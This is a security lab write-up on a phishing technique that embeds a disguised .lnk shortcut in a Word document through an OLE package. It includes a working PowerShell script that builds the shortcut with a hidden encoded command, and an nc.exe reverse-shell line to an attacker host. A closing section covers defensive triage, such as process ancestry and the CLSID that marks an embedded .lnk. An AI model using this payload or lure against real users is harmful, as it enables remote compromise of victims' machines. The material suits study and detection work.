# Phishing: OLE + LNK This lab explores a popular phishing technique where attackers embed .lnk files into the Office documents and camouflage them with Ms Word office icons in order to deceive victims to click and run them. ## Weaponization Creating an .LNK file that will trigger the payload once executed: {% code title="attacker\@local" %} ```csharp $command = 'Start-Process c:\shell.cmd' $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) $obj = New-object -comobject wscript.shell $link = $obj.createshortcut("c:\experiments\ole+lnk\Invoice-FinTech-0900541.lnk") $link.windowstyle = "7" $link.targetpath = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $link.iconlocation = "C:\Program Files\Windows NT\Accessories\wordpad.exe" $link.arguments = "-Nop -sta -noni -w hidden -encodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAOgBcAHMAaABlAGwAbAAuAGMAbQBkAA==" $link.save() ``` {% endcode %} Powershell payload will trigger a rudimentary NC reverse shell: {% code title="c:\shell.cmd" %} ```csharp C:\tools\nc.exe 10.0.0.5 443 -e cmd.exe ``` {% endcode %} Once the above powershell script is executed, an `.LNK` shortcut is created: ![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRFnt-cVU18pcOCBHO%2F-LKRGjwTWCMH7EOxbc_b%2Fole-lnk-shortcut-created.png?alt=media\&token=d2b25553-5d1d-4535-96b3-f6b0d1ffb194) Let's create a Word document that will contain the malicious shortcut that was created in the previous step: ![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRFnt-cVU18pcOCBHO%2F-LKRH-VzxxtN9fSNg2js%2Fole-good-document.png?alt=media\&token=7fae95e2-4db2-4cf1-8e41-9de8245ac2eb) Let's insert a new object into the document by selecting a `Package`and changing its icon source to a Microsoft Word executable: ![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRIe3d5PL89KiDiGIV%2F-LKRH8A1jNeHJgRGRomK%2Fole-insert-ole-object-with-icon.png?alt=media\&token=4434c3d0-adfd-4352-9968-c5c10c527f1a) ![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRIe3d5PL89KiDiGIV%2F-LKRHOVbCzGL4Zo2WrpY%2Fole-change-icon.png?alt=media\&token=427349aa-13bd-47c4-8180-a01c41bcb7a6) Point the package to the .lnk file containing the payload: ![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRIe3d5PL89KiDiGIV%2F-LKRIT6mm4h7eR5y9ONB%2Fole-payload.png?alt=media\&token=d0213d76-d56d-483e-a477-a6da38654390) Final result: ![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRIe3d5PL89KiDiGIV%2F-LKRIbB24hFM9R322XmS%2Fole-weaponized.png?alt=media\&token=032c5758-a491-48a7-85b3-aff36f38f94a) ## Execution Victim executing the embedded document. Gets presented with a popup to confirm execution: ![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRIingfVbtKzhAXuu4%2F-LKRIrtSxtXDuyyIk0fC%2Fole-execution.png?alt=media\&token=c9a8a13d-20bf-40b9-b2bc-8d6033eedbf4) Once the victim confirms they want to open the file - the reverse shell comes back to the attacker: ![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRIingfVbtKzhAXuu4%2F-LKRIrtTxniAvaJ_vV5m%2Fole-execution2.png?alt=media\&token=18209e76-c17d-4f55-8f1b-5e428fae392c) {% file src="" %} OLE+LNK Powershell Script {% endfile %} {% file src="" %} Invoice-FinTech-0900541.lnk {% endfile %} {% file src="" %} Phishing: OLE+Lnk MS Word Doc Package {% endfile %} ## Observations After the payload is triggered, the process ancestry looks as expected - powershell gets spawned by winword, cmd is spawned by powershell..: ![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRJDQTbUxGUjd7WLxd%2F-LKRJFn47fbXoXbUavdK%2Fole-ancestry1.png?alt=media\&token=2a4d8cc0-e245-4619-abc5-3e05737b7b2c) Soon after, the powershell gets killed and cmd.exe becomes an orphaned process: ![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRJDQTbUxGUjd7WLxd%2F-LKRJHK53l5r1CQKTwBT%2Fole-ancestry2.png?alt=media\&token=2b83123a-1229-4e6d-9e36-8b28f6f06bbc) Like in [T1137: Phishing - Office Macros](https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office/t1137-office-vba-macros), you can use rudimentary tools on your Windows workstation to quickly triage the suspicious Office document. First off, rename the file to a .zip extension and unzip it. Then you can navigate to `word\embeddings` and find `oleObject.bin` file that contains the malicious `.lnk`: ![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRfKa4jYy2qjm9kkTv%2F-LKRdsdTB5mK-QRljpQN%2Fole-embedded-bin.png?alt=media\&token=fafe3987-8cf1-41ba-8025-2268b95b7ce4) Then you can do a simple `strings` or hexdump against the file and you should immediately see signs of something that should raise your eyebrow(s): ```csharp hexdump.exe -C .\oleObject1.bin ``` ![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRfKa4jYy2qjm9kkTv%2F-LKRfHZ7vT28S8ZGjHjx%2Fole-hexdump.png?alt=media\&token=6a6ea6be-beab-4f57-aed7-3275bab53bd3) As an analyst, one should look for `CLSID 00021401-0000-0000-c000-000000000046` in the .bin file, which signifies that the .doc contains an embnedded .lnk file. In our case this can be observed here: ![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LLLlUffKcHfBT7MFQh5%2F-LLLlfqklzz5ti7PtC1W%2Flnk-clsid.png?alt=media\&token=43f2f9b1-b009-4f9e-b669-9e9946585830) ## References {% embed url="" %} {% embed url="" %}